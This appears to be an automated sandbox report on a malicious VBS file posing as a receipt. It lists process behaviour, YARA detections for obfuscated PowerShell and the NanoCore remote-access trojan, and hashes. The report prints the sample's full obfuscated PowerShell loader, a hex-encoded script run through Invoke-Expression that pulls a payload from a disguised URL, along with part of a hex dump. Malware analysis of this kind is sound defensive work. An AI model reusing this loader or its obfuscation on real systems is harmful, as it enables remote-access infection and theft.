2d
                        Data Ascii: 79-74-65-5b-5d-5d-24-48-36-3d-20-56-49-50-20-24-48-48-0a-24-61-61-20-3d-20-27-4e-45-54-2e-50-45-27-0a-24-62-62-20-3d-20-27-42-61-64-67-65-72-27-0a-24-6f-6f-20-3d-27-47-65-74-48-49-53-54-4f-52-52-59-27-2e-52-65-70-6c-61-63-65-28-22-48-49-53-54-4f-52-52-59-


                        Code Manipulations

                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:16:17:08
                        Start date:14/09/2021
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\16 Items receipt.vbs'
                        Imagebase:0x7ff73e170000
                        File size:163840 bytes
                        MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.432999714.0000020EAE009000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.431972357.0000020EAE005000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.435172148.0000020EAFE40000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.433096509.0000020EAE01D000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.432965869.0000020EAE019000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.432380237.0000020EAE013000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.433900532.0000020EAE01E000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.433824220.0000020EAE009000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.432768134.0000020EAE209000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.433881255.0000020EAE01A000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.430815778.0000020EAFE41000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.434440600.0000020EAE20A000.00000004.00000040.sdmp, Author: Florian Roth
                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.432461563.0000020EAE008000.00000004.00000001.sdmp, Author: Florian Roth
                        Reputation:high

                        General

                        Start time:16:17:09
                        Start date:14/09/2021
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/PeIb5p/ffrtgH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split '-X-' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
                        Imagebase:0x7ff617cb0000
                        File size:447488 bytes
                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000003.00000002.410735258.000002691A89E000.00000004.00000001.sdmp, Author: Florian Roth
                        Reputation:high

                        General

                        Start time:16:17:10
                        Start date:14/09/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7ecfc0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:16:18:21
                        Start date:14/09/2021
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                        Imagebase:0x760000
                        File size:55400 bytes
                        MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.595579557.0000000003DD3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        Reputation:moderate

                        Disassembly

                        Code Analysis

                        Reset < >